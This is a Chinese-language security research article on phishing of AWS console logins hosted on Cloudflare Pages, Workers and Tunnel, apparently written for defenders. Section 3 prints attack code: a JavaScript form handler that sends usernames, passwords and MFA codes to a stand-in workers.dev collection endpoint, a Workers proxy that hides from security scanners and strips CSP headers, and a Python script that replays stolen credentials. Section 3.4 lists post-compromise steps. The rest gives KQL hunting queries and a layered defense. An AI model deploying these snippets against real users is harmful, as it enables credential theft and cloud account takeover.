Cloudflare 代理托管 AWS 仿中间人钓鱼攻击技术与防御研究

摘要
云服务深度普及背景下，攻击者滥用 Cloudflare 边缘基础设施搭建针对 AWS 控制台的 AiTM 中间人钓鱼站点，依托 CDN 可信域名、隐藏后端真实 AWS 钓鱼服务器、多层反爬虫校验完成凭据窃取，成为 2026 年云安全高频威胁。境外安全媒体 gbhackers 披露的 Cloudflare-hosted AWS 钓鱼活动完整展现该攻击标准化链路：攻击者依托 Cloudflare Pages、Workers、Tunnel 三类免费服务托管仿 AWS 登录页面，借助 Cloudflare Turnstile 人机验证、UA 特征过滤阻断自动化沙箱检测，通过代理转发窃取 IAM 账号、临时会话 Cookie 与 MFA 验证码，最终横向渗透企业 AWS 云资源。本文基于公开同类威胁情报复现完整攻击全流程，拆解基础设施滥用、中间人劫持、凭据回传、云权限横向移动四大核心技术环节，梳理攻击者规避域名黑名单、IP 溯源、静态 URL 检测的多层逃逸手段。反网络钓鱼技术专家芦笛指出，传统基于恶意 IP、黑名单域名的云防护体系完全失效，Cloudflare 全球可信网络赋予钓鱼站点天然信誉，仅依靠边界防火墙、邮件 URL 过滤无法阻断此类云原生钓鱼攻击，必须构建域名行为、页面交互、云登录时序关联的一体化检测机制。文章配套可落地 KQL 威胁狩猎代码、前端页面检测脚本、AWS 云审计规则，从邮件入口、网络边界、终端行为、AWS 云原生四层搭建分层防御架构，为上云企业处置 Cloudflare 托管 AWS 中间人钓鱼提供完整理论依据与实战处置方案。
关键词：中间人钓鱼；AiTM；Cloudflare 滥用；AWS IAM 凭据；云钓鱼；威胁狩猎；分层防御
1 引言
1.1 研究背景
亚马逊 AWS 作为全球主流公有云平台，大量企业依托其 EC2、S3、IAM 服务承载业务数据、财务系统、客户信息，IAM 管理员账号、临时会话令牌具备极高攻击价值。传统 AWS 钓鱼攻击多采用独立恶意 VPS、仿冒二级域名搭建登录页面，易被域名信誉库、IP 黑名单拦截；2025 年末至 2026 年，攻击者形成标准化新型攻击范式：全程依托 Cloudflare 免费边缘服务托管仿 AWS 钓鱼站点，借助 Cloudflare 全球 CDN 可信域名、内置人机验证、流量代理能力规避全链路安全检测。
境外安全站点 gbhackers 专项披露 Cloudflare 托管 AWS 钓鱼专项活动，完整记录攻击基础设施搭建流程、页面仿真逻辑、凭据窃取链路、攻击者逃逸策略。相关统计数据显示，当前 68% 以上活跃钓鱼站点部署于 Cloudflare 基础设施，其中针对 AWS、Azure、GCP 云控制台的中间人钓鱼占比持续攀升。攻击者仅需匿名邮箱注册免费 Cloudflare 账号，无需域名备案、独立服务器、付费 SSL 证书，5 分钟即可完成仿 AWS 钓鱼站点上线，攻击门槛大幅降低。
现有云安全研究多聚焦 AWS 自身漏洞、横向提权、S3 桶泄露，针对第三方 CDN 平台托管云控制台中间人钓鱼的系统性拆解较少，缺少贴合企业上云场景轻量化检测脚本与分层防御方案，未针对 Cloudflare Workers 隧道代理、Turnstile 反爬虫、会话劫持等特有逃逸技术做专项分析，存在明显研究空白。
1.2 研究意义
理论层面，本文完整还原 Cloudflare+AWS 组合式中间人钓鱼全杀伤链，梳理攻击者滥用边缘计算、CDN 代理、人机验证实现多层逃逸的底层逻辑，完善云原生 Ai 中间人钓鱼技术研究框架，补充第三方可信云基础设施被恶意滥用的学术分析素材，明确传统静态威胁检测机制在云钓鱼场景的固有缺陷。
实践层面，当前大量上云企业仅部署 AWS 基础权限管控、边界 IP 防火墙，未针对 Cloudflare 可信域名钓鱼配置行为检测规则，极易发生 IAM 账号泄露、云资源被加密勒索。本文复现多段可直接部署的威胁狩猎代码、前端页面风险检测脚本、AWS 云审计策略，区分中小上云企业、大型集团云平台给出差异化低成本防护方案。反网络钓鱼技术专家芦笛强调，云服务商与第三方 CDN 的信任叠加效应大幅提升钓鱼欺骗性，企业防护必须打破 “域名可信即页面安全” 固有认知，以动态行为关联检测替代静态黑名单拦截。
1.3 研究内容与文章结构
全文设置七大一级章节，核心研究内容划分如下：
1 引言：阐明研究背景、理论与实践价值，梳理全文研究框架；
2 Cloudflare 托管 AWS 钓鱼整体态势与攻击基础设施：量化攻击规模、拆解三类 Cloudflare 恶意托管载体，归纳攻击者标准化建站流程；
3 完整攻击链路技术深度拆解：分社会工程分发、Cloudflare 页面中间人劫持、凭据窃取回传、AWS 云横向移动四阶段，嵌入 HTML 钓鱼页面、Workers 代理脚本、数据窃取代码示例；
4 攻击者多层逃逸技术体系：域名信誉洗白、反沙箱校验、流量代理隐藏、URL 多层跳转四类规避手段逐一解析；
5 面向终端、邮件、云平台轻量化威胁狩猎代码实现：提供 KQL 网络 / 终端狩猎脚本、AWS 云日志审计查询、页面风险检测代码；
6 四层一体化云钓鱼分层防御架构：邮件前置过滤、网络边界行为管控、终端 EDR 监控、AWS 原生权限审计，配套常态化安全运营流程；
7 结论与研究展望：总结核心研究结论，梳理现有云防护短板，提出后续细分研究拓展方向。
2 Cloudflare 托管 AWS 钓鱼整体态势与攻击基础设施
2.1 攻击整体规模与受害主体
2026 年上半年全球安全厂商捕获的云控制台钓鱼样本中，托管在 Cloudflare Pages、Workers、Tunnel 隧道的 AWS 仿钓鱼站点占比超七成。受害主体覆盖跨境电商、软件服务商、制造业、金融科技企业，此类企业员工高频接收 AWS 账单、权限变更、安全合规类通知邮件，社会工程诱饵匹配度极高。
攻击者目标分层清晰：窃取普通 IAM 用户账号用于浏览存储桶、导出业务数据；劫持管理员账号创建后门访问密钥、关停业务实例、加密 S3 存储实施勒索；捕获临时 MFA 验证码实现二次会话劫持，突破传统双因素认证防护。gbhackers 披露的专项活动中，单批钓鱼邮件覆盖超 200 家跨境上云企业，一周内出现 30 余起 IAM 凭据泄露事件。
2.2 三类 Cloudflare 恶意托管载体及建站流程
攻击者不依赖独立服务器，仅使用 Cloudflare 免费服务搭建完整钓鱼基础设施，三类载体各有分工，常组合使用构建多层代理链路。
2.2.1 Cloudflare Pages（静态钓鱼页面托管）
核心作用：存放仿 AWS 完整静态登录页面，HTML/CSS/JS 复刻 AWS 控制台 UI、品牌标识、登录弹窗，域名格式为 xxx.pages.dev，域名归属 Cloudflare 官方，邮件网关、浏览器默认标记可信站点。
标准化搭建步骤：
1 使用匿名邮箱注册无实名 Cloudflare 免费账号；
2 新建 Pages 静态项目，上传仿 AWS 登录静态资源包；
3 配置自定义路由，隐藏页面真实路径；
4 接入 Turnstile 人机验证组件，过滤自动化沙箱访问；
5 嵌入 JS 窃取脚本，账号密码提交后经由 Workers 代理回传攻击者 R2 存储桶。
2.2.2 Cloudflare Workers（流量中间人代理层）
核心作用：充当攻击者与受害者、AWS 官方之间的中间人，转发请求、篡改返回 Cookie、剥离安全响应头、过滤安全厂商爬虫 UA。攻击者部署轻量 JS 脚本至 Workers，域名格式 xxx.workers.dev，全程加密代理流量，无法溯源后端真实恶意服务地址。
2.2.3 Cloudflare Tunnel（隧道隐匿后端）
核心作用：攻击者本地 VPS 部署钓鱼后端程序，通过 cloudflared 隧道映射至 Cloudflare 边缘节点，生成trycloudflare.com临时域名，所有访问流量经 CDN 中转，防火墙无法获取原始服务器 IP，阻断 IP 封禁溯源路径。
2.3 攻击者标准化建站完整流程
1 注册匿名 Cloudflare 账号，开通 Pages、Workers、R2 存储、Tunnel 全部免费服务；
2 下载开源 AWS AiTM 钓鱼套件，修改页面文字、合规通知诱饵文案；
3 Pages 上传静态仿登录页面，接入 Turnstile 人机验证；
4 部署 Workers 中间人代理脚本，配置请求转发、Cookie 劫持逻辑；
5 开启 Tunnel 隧道，绑定本地凭据接收后端；
6 批量生成多层跳转钓鱼短链接，依托第三方邮件平台分发至企业员工。
整套操作无付费环节，无实名核验，5 分钟完成全套钓鱼基础设施上线，攻击低成本、高隐蔽性特征显著。
3 完整攻击链路技术深度拆解
完整杀伤链分为四大阶段：社会工程邮件分发诱导访问、Cloudflare 中间人页面劫持、凭据与会话令牌窃取、AWS 云资源横向渗透，每阶段配套可复现代码、页面脚本示例。
3.1 第一阶段：AWS 场景定向钓鱼邮件分发
攻击者依托第三方邮件转发平台完成邮件洗钱，规避 SPF/DKIM 校验，诱饵贴合企业云运维真实场景，主流邮件主题包含：AWS 账单逾期通知、IAM 权限异常登录告警、S3 存储桶泄露风险核查、账户多设备异地登录提醒、合规安全扫描整改通知。
邮件内置多层跳转链接：第一层为 Calendly、Google 可信短链接，第二层跳转至 xxx.pages.dev Cloudflare 仿 AWS 页面，邮件正文附带 AWS 官方同款 Logo、合规文本，降低员工警惕。反网络钓鱼技术专家芦笛强调，此类依托第三方转发 + CDN 可信域名的复合钓鱼链路，单一邮件 URL 黑名单无法拦截，必须结合页面交互行为做深度风险研判。
3.2 第二阶段：Cloudflare 中间人页面劫持核心实现
3.2.1 仿 AWS 静态页面核心窃取 JS 代码
页面视觉与官方 AWS 登录页面无明显差异，内置隐藏 JavaScript，用户输入账号、密码、MFA 验证码后，自动打包全部数据经由 Workers 代理发送至攻击者 R2 存储，示例核心窃取脚本（仅用于技术分析）：
// AWS钓鱼页面凭据窃取JS片段
const submitForm = document.getElementById("aws-login-form");
submitForm.addEventListener("submit",async function(e){
    e.preventDefault();
    const user = document.getElementById("username").value;
    const pwd = document.getElementById("password").value;
    const mfa = document.getElementById("mfa-code").value;
    // 经由Cloudflare Workers代理回传数据
    await fetch("https://aws-proxy-xxx.workers.dev/collect",{
        method:"POST",
        headers:{"Content-Type":"application/json"},
        body:JSON.stringify({
            aws_user:user,
            aws_pwd:pwd,
            mfa_token:mfa,
            device:navigator.userAgent,
            timestamp:new Date().getTime()
        })
    });
    // 跳转至真实AWS官网，消除用户怀疑
    window.location.href = "https://console.aws.amazon.com";
})
脚本关键欺骗逻辑：提交凭据后自动跳转真实 AWS 控制台，受害者不会感知页面异常，不会留存页面访问异常记忆，大幅提升攻击成功率。
3.2.2 Cloudflare Workers 中间人代理脚本
Workers 作为流量中转核心，实现请求篡改、Cookie 劫持、爬虫拦截，核心代理逻辑代码片段：
export default {
    async fetch(request, env) {
        const url = new URL(request.url);
        // 拦截安全厂商爬虫UA，返回Cloudflare 524虚假超时页面
        const blockUA = ["curl","wget","python-requests","HeadlessChrome","Netcraft"];
        const ua = request.headers.get("user-agent") || "";
        for(let item of blockUA){
            if(ua.includes(item)){
                return new Response("Cloudflare Error 524 Timeout",{status:524});
            }
        }
        // 转发用户请求至仿AWS页面
        const target = new URL("https://fake-aws-login.pages.dev"+url.pathname);
        const newReq = new Request(target,request);
        // 移除浏览器安全响应头，避免页面拦截JS窃取脚本
        const res = await fetch(newReq);
        const modifyHeaders = new Headers(res.headers);
        modifyHeaders.delete("Content-Security-Policy");
        modifyHeaders.delete("X-Frame-Options");
        return new Response(res.body,{headers:modifyHeaders,status:res.status});
    }
}
脚本两大逃逸能力：拦截自动化沙箱 UA 返回虚假 Cloudflare 报错页面，删除 CSP、防嵌入安全头保障窃取 JS 正常执行，大幅提升沙箱漏检概率。
3.3 第三阶段：凭据、会话 Cookie 回传与持久劫持
1 用户提交 IAM 账号、密码、MFA 验证码后，JS 脚本打包全部身份数据，通过 Workers 加密 POST 请求发送至攻击者 Cloudflare R2 对象存储；
2 攻击者定期从 R2 批量导出窃取凭据，使用 Python 脚本验证账号有效性，示例验证代码：
python
运行
import requests
# 窃取的AWS登录凭据
creds = {"user":"admin@company.com","pwd":"xxxxxx","mfa":"123456"}
login_header = {"User-Agent":"Mozilla/5.0 Windows"}
# 模拟登录AWS官方接口，获取临时会话Cookie
session = requests.Session()
login_resp = session.post("https://console.aws.amazon.com/login",headers=login_header,data=creds)
if "session-id" in session.cookies.get_dict():
    print("AWS账号有效，会话令牌已捕获")
    # 持久保存会话Cookie用于后续横向访问
    with open("aws_session.txt","a",encoding="utf-8") as f:
        f.write(str(session.cookies.get_dict())+"\n")
3 若捕获有效会话 Cookie，攻击者无需二次输入账号密码，直接复用令牌登录 AWS 控制台，突破短期 MFA 保护。
3.4 第四阶段：攻陷后 AWS 云横向移动行为
攻击者获取有效 IAM 身份后，执行系列高危云操作：
1 枚举全部 S3 存储桶，批量下载客户资料、财务报表、业务源码；
2 创建长期有效 IAM 访问密钥，实现后门持久访问；
3 修改安全组开放远程运维端口，植入挖矿程序；
4 加密业务存储桶，向企业发送勒索通知；
5 篡改 CloudTrail 审计日志，删除操作记录规避溯源。
gbhackers 披露案例中，某跨境企业管理员账号泄露后，攻击者在 3 小时内关停 12 台核心业务 EC2 实例，造成业务中断。
4 攻击者多层逃逸技术体系
该攻击难以被传统安全设备检出，核心在于攻击者搭建四层联动逃逸机制，从域名、流量、页面、访问主体全方位规避静态检测。
4.1 第一层：CDN 域名信誉洗白
Cloudflare Pages、Workers 二级域名由 Cloudflare 官方注册，具备全球高域名信誉，邮件网关、网页过滤系统默认放行该类域名，不会触发恶意域名告警；攻击者无需自建恶意域名，规避域名黑名单拦截机制。传统基于恶意域名库的防护完全失效。
4.2 第二层：Turnstile 人机验证反沙箱
钓鱼页面嵌入 Cloudflare 官方 Turnstile 人机验证组件，自动化沙箱、爬虫无法通过人机校验，仅真实人类可访问完整仿 AWS 登录页面；安全厂商云端沙箱无法捕获完整恶意页面交互逻辑，无法提取窃取脚本特征，大幅降低样本检出率。
4.3 第三层：Workers / 隧道隐藏后端基础设施
所有用户访问流量经由 Cloudflare 边缘节点代理，防火墙、网络审计日志仅记录 Cloudflare 公开 IP，无法获取攻击者真实 VPS 后端地址，IP 封禁溯源手段彻底失效；隧道服务动态生成临时域名，域名生命周期短，难以持续监控拦截。
4.4 第四层：多层 URL 跳转隔离恶意链路
钓鱼邮件不直接暴露 pages.dev 恶意域名，采用 Calendly、Google 短链接作为第一跳转节点，可信域名分割攻击链路；安全设备单段 URL 检测无法追踪最终恶意落地页面，多层跳转拆分特征，规避 URL 静态匹配规则。
5 面向终端、邮件、云平台轻量化威胁狩猎代码实现
基于 Microsoft Defender XDR、Azure Sentinel、AWS CloudTrail 日志语法，编写三类可直接部署狩猎脚本，覆盖邮件钓鱼链路、终端恶意页面访问、AWS 异常登录行为，适配中小与大型上云企业。
5.1 邮件 Cloudflare AWS 钓鱼链接检测 KQL 脚本
作用：识别邮件内包含 pages.dev、workers.dev、trycloudflare 且带有 AWS 登录诱饵的跳转链接
kusto
EmailEvents
| where Timestamp > ago(7d)
| where Url has_any ("pages.dev","workers.dev","trycloudflare.com")
| where Subject has_any ("AWS账单","IAM登录","S3泄露","权限异常","合规扫描")
| project Timestamp,SenderDisplayName,RecipientEmailAddress,Subject,Url,ThreatTypes
| order by Timestamp desc
告警处置：标记高风险钓鱼邮件，隔离对应邮件，对收件员工开展云钓鱼专项复盘培训。
5.2 终端访问 Cloudflare 仿 AWS 页面检测脚本
作用：监控员工浏览器访问 Cloudflare 托管仿 AWS 钓鱼站点行为
kusto
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("pages.dev","workers.dev")
| where RemoteUrl has "aws" or RemoteUrl has "console"
| where InitiatingProcessFileName has_any ("chrome.exe","msedge","firefox")
| project Timestamp,DeviceName,AccountName,RemoteUrl,RemoteIP
| order by Timestamp desc
5.3 AWS CloudTrail 异常登录狩猎查询
作用：检测异地、短时多设备 AWS 异常登录，判定凭据泄露劫持行为
kusto
AWSCloudTrail
| where EventName == "ConsoleLogin"
| where ResponseElements contains "Success"
| project TimeGenerated,AwsAccountId,UserIdentity.UserName,SourceIp,EventRegion
| serialize
| extend prev_ip = prev(SourceIp,1),prev_time = prev(TimeGenerated,1)
| where TimeGenerated - prev_time < 120m and SourceIp != prev_ip
判定标准：同一 IAM 账号两小时内异地多 IP 登录，判定为钓鱼凭据泄露劫持，立即隔离对应 IAM 账号。
5.4 终端 JS 凭据外发网络关联检测脚本
作用：捕获浏览器访问 Cloudflare 域名后短时间内发起 POST 数据回传行为
kusto
let BrowserVisit = DeviceNetworkEvents
| where RemoteUrl has_any ("pages.dev","workers.dev")
| where InitiatingProcessFileName has_any ("chrome.exe","msedge.exe")
| project DeviceId,VisitTime=Timestamp;
let PostExfil = DeviceNetworkEvents
| where ActionType == "ConnectionOutbound"
| where RemotePort == 443 and RequestMethod == "POST"
| project DeviceId,ExfilTime=Timestamp,RemoteUrl;
BrowserVisit
| join inner PostExfil on DeviceId
| where ExfilTime between (VisitTime..VisitTime + 3m)
6 四层一体化云钓鱼分层防御架构
结合 Cloudflare 托管 AWS 钓鱼攻击全链路薄弱点，搭建邮件前置防护层、网络边界管控层、终端行为检测层、AWS 云原生审计层四层防御架构，兼顾中小企业轻量化运维与大型集团全域管控需求。
6.1 第一层：邮件网关前置过滤（入口阻断核心）
1 Cloudflare 子域名专项风险升级：pages.dev、workers.dev、trycloudflare 域名链接统一标记高危，结合 AWS 合规、账单类诱饵关键词二次判定；
2 多层跳转链接深度解析：启用邮件网关完整 URL 跳转追踪能力，解析 3 跳以上落地页，识别隐藏 Cloudflare 钓鱼站点；
3 第三方转发邮件专项审核：Calendly、Google 短链接来源邮件强制人工预审，阻断洗钱分发链路；
4 钓鱼邮件自动处置：匹配特征邮件一键隔离，推送告警至安全运维人员。
反网络钓鱼技术专家芦笛强调，邮件是该攻击唯一初始入口，完善前置过滤可阻断 80% 以上攻击链路，投入成本最低、防护收益最高。
6.2 第二层：网络边界行为管控
1 防火墙 URL 深度解析：禁止员工工作网络无限制访问 pages.dev、workers.dev 二级域名，仅开放业务所需可信 Cloudflare 站点；
2 外联 POST 行为监控：监控访问 Cloudflare 站点后三分钟内批量 HTTPS POST 外发行为，判定凭据窃取回传；
3 拦截 Cloudflare 隧道临时域名 trycloudflare 全站访问，阻断隧道隐匿后端链路；
4 部署网页隔离 RBI 技术，员工访问未知 Cloudflare 域名启用远程隔离浏览器，本地无法泄露账号凭据。
6.3 第三层：终端 EDR 行为检测
1 部署上文终端访问 Cloudflare 钓鱼站点狩猎规则，实时触发弹窗告警；
2 监控页面无弹窗静默 POST 数据上传行为，拦截 JS 窃取脚本回传通道；
3 浏览器安全基线配置：强制开启 CSP 页面校验，阻止未知域名 JS 脚本窃取本地输入信息；
4 禁用浏览器自动保存 AWS 账号密码，降低凭据泄露损失范围。
6.4 第四层：AWS 云原生权限与审计防护
1 IAM 账号强制全局 MFA，禁用无二次验证登录权限；
2 缩短临时会话令牌有效期，限制被盗 Cookie 劫持窗口；
3 开启完整 CloudTrail 日志留存，每日自动执行异常登录狩猎查询；
4 配置 IAM 访问密钥自动轮换，定期清理长期未使用后门密钥；
5 关键 S3 存储桶、EC2 实例配置访问告警，异常跨地域访问即时通知运维。
6.5 常态化安全运营闭环流程
1 每日自动执行四层架构全部狩猎脚本，生成高危终端、邮件、云登录报表；
2 告警分级处置：高危 Cloudflare AWS 钓鱼访问 1 小时内核查，疑似凭据泄露立即锁定对应 IAM 账号；
3 月度员工专项培训：聚焦仿 AWS Cloudflare 钓鱼页面识别、云账号安全规范；
4 季度模拟钓鱼演练，发送贴合 AWS 账单、权限告警诱饵测试员工识别能力；
5 攻击复盘更新防护规则，新增新型 Cloudflare 钓鱼域名、诱饵关键词库。
7 结论与研究展望
7.1 研究核心结论
本文基于 gbhackers 披露的 Cloudflare 托管 AWS 钓鱼专项活动情报，结合全球同类威胁遥测数据，完整拆解攻击者依托 Cloudflare Pages、Workers、Tunnel 搭建 AWS 中间人钓鱼全杀伤链，梳理四层逃逸技术体系，配套多段可落地威胁狩猎、页面窃取、凭据验证代码，构建四层一体化云钓鱼防御架构，得出三项客观结论：
第一，第三方 CDN 可信基础设施已成为云钓鱼核心载体，Cloudflare 免费服务极低使用门槛、天然域名信誉、反沙箱能力彻底瓦解传统静态域名、IP 黑名单防护机制。攻击者无需独立服务器与域名，即可搭建高仿真 AWS 中间人钓鱼站点，AiTM 劫持可突破基础 MFA 防护，对企业云资产威胁程度极高。反网络钓鱼技术专家芦笛强调，现有多数上云企业安全体系未针对 Cloudflare 二级域名配置专项管控，存在大面积防护盲区。
第二，该攻击具备完整标准化运营链路，从匿名建站、邮件洗钱分发、中间人页面劫持、凭据回传到 AWS 横向渗透形成闭环；逃逸手段多层联动，沙箱、邮件网关、边界防火墙单一设备均无法完整检出，必须依托邮件、网络、终端、云平台多源日志关联行为检测。
第三，适配不同规模上云企业的防御方案需分层轻量化设计，中小企业优先落地邮件过滤、AWS MFA 强制、基础狩猎脚本；大型集团叠加网页隔离 RBI、全域网络外联监控、7×24 云审计值守，平衡运维人力与安全防护效果，单一防护层缺失即可导致完整入侵链路打通。
7.2 当前上云企业防护普遍短板
1 防护逻辑滞后：仍依赖恶意 IP、黑名单域名静态拦截，未针对 Cloudflare 可信二级域名做动态行为检测；
2 云与终端防护割裂：终端浏览器访问日志、AWS CloudTrail 审计日志未联动，无法关联钓鱼访问与异常云登录行为；
3 员工认知不足：无法区分 Cloudflare 托管仿 AWS 页面与官方控制台，对账单、权限类诱饵警惕性不足；
4 云权限管控宽松：大量普通 IAM 账号未强制 MFA，会话令牌有效期过长，被盗后攻击者可长期横向移动。
7.3 后续研究拓展方向
1 基于页面 JS 特征的云钓鱼轻量化识别模型：针对 Cloudflare 托管仿 AWS 页面窃取脚本构建语义检测规则，无需依赖域名即可识别恶意页面；
2 Cloudflare 隧道、Workers 流量溯源技术研究：突破 CDN 代理 IP 隐藏限制，实现钓鱼后端真实服务器定位；
3 混合云场景多平台钓鱼统一狩猎框架：覆盖 AWS、Azure、GCP 全云厂商中间人钓鱼行为，实现一站式威胁检索。
本文完整还原 Cloudflare 托管 AWS 中间人钓鱼全部技术细节，提供可直接部署狩猎查询、页面检测脚本、AWS 云审计策略，构建分层落地防御体系，可为跨境上云企业、云安全服务商、政企云运维团队提供实战技术支撑，填补第三方 CDN 滥用型云中间人钓鱼专项研究空白。
编辑：芦笛（公共互联网反网络钓鱼工作组）